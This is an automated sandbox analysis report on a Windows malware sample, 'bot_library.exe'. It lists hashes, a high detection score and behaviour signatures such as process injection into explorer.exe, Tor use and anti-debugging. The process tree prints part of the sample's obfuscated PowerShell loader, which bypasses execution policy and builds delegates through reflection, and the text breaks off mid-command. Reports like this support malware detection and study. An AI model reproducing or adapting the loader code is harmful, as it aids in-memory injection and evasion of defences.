Edit tour
Windows
Analysis Report
bot_library.exe
Overview
General Information
| Sample name: | bot_library.exe |
| Analysis ID: | 1508874 |
| MD5: | 1f669ce249a053178531a1f2009f150b |
| SHA1: | 0007d6a74135997b15b0d6327230b08a0488b06e |
| SHA256: | 28cefc6fdac17623b223a16ead72f6afa6af60eae3600a9834aaa9349c9cf6b2 |
| Infos: |  |
 | |
Detection
| Score: | 92 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Found Tor onion address
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Tor Client/Browser Execution
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64native
bot_library.exe (PID: 8104 cmdline: "C:\Users\ user\Deskt op\bot_lib rary.exe" MD5: 1F669CE249A053178531A1F2009F150B) 
conhost.exe (PID: 8112 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) 
powershell.exe (PID: 7452 cmdline: "powershel l" -NoProf ile -Execu tionPolicy Bypass -C ommand " function Get-Delega te { P aram([Type []]$bq5kde sZx23TC4, [Type]$9Mk L4dZ6Vp) $JscLuo RimgT = [A ppDomain]: :CurrentDo main.Defin eDynamicAs sembly( (New-O bject Refl ection.Ass emblyName( [char](82) +[char](10 1)+[char]( 102)+[char ](108)+[ch ar](101)+[ char](99)+ [char](116 )+[char](1 01)+[char] (100)+[cha r](68)+[ch ar](101)+[ char](108) +[char](10 1)+[char]( 103)+[char ](97)+[cha r](116)+[c har](101)) ), [ Reflection .Emit.Asse mblyBuilde rAccess]:: Run).Defin eDynamicMo dule( [char](7 3)+[char]( 110)+[char ](77)+[cha r](101)+[c har](109)+ [char](111 )+[char](1 14)+[char] (121)+[cha r](77)+[ch ar](111)+[ char](100) +[char](11 7)+[char]( 108)+[char ](101), $F alse).Defi neType( [char] (77)+[char ](121)+[ch ar](68)+[c har](101)+ [char](108 )+[char](1 01)+[char] (103)+[cha r](97)+[ch ar](116)+[ char](101) +[char](84 )+[char](1 21)+[char] (112)+[cha r](101), [char ](67)+[cha r](108)+[c har](97)+[ char](115) +[char](11 5)+[char]( 44)+[char] (32)+[char ](80)+[cha r](117)+[c har](98)+[ char](108) +[char](10 5)+[char]( 99)+[char] (44)+[char ](32)+[cha r](83)+[ch ar](101)+[ char](97)+ [char](108 )+[char](1 01)+[char] (100)+[cha r](44)+[ch ar](32)+[c har](65)+[ char](110) +[char](11 5)+[char]( 105)+[char ](67)+[cha r](108)+[c har](97)+[ char](115) +[char](11 5)+[char]( 44)+[char] (32)+[char ](65)+[cha r](117)+[c har](116)+ [char](111 )+[char](6 7)+[char]( 108)+[char ](97)+[cha r](115)+[c har](115), [Mu lticastDel egate]) $JscLuoR imgT.Defin eConstruct or( [char](82) +[char](84 )+[char](8 3)+[char]( 112)+[char ](101)+[ch ar](99)+[c har](105)+ [char](97) +[char](10 8)+[char]( 78)+[char] (97)+[char ](109)+[ch ar](101)+[ char](44)+ [char](32) +[char](72 )+[char](1 05)+[char] (100)+[cha r](101)+[c har](66)+[ char](121) +[char](83 )+[char](1 05)+[char] (103)+[cha r](44)+[ch ar](32)+[c har](80)+[ char](117) +[char](98 )+[char](1 08)+[char] (105)+[cha r](99), [Refle ction.Call ingConvent ions]::Sta ndard, $bq5kde sZx23TC4). SetImpleme ntationFla gs([char]( 82)+[char] (117)+[cha r](110)+[c har](116)+ [char](105 )+[char](1 09)+[char] (101)+[cha r](44)+[ch ar](32)+[c har](77)+[ char](97)+ [char](110 )+[char](9 7)+[char]( 103)+[char ](101)+[ch ar](100)) $JscLu oRimgT.Def ineMethod( [ch ar](73)+[c har](110)+ [char](118 )+[char](1 11)+[char] (107)+[cha r](101), [char ](80)+[cha r](117)+[c har](98)+[ char](108) +[char](10 5)+[char]( 99)+[char] (44)+[char ](32)+[cha r](72)+[ch ar](105)+[ char](100) +[char](10 1)+[char]( 66)+[char] (121)+[cha r](83)+[ch ar](105)+[ char](103) +[char](44 )+[char](3 2)+[char]( 78)+[char]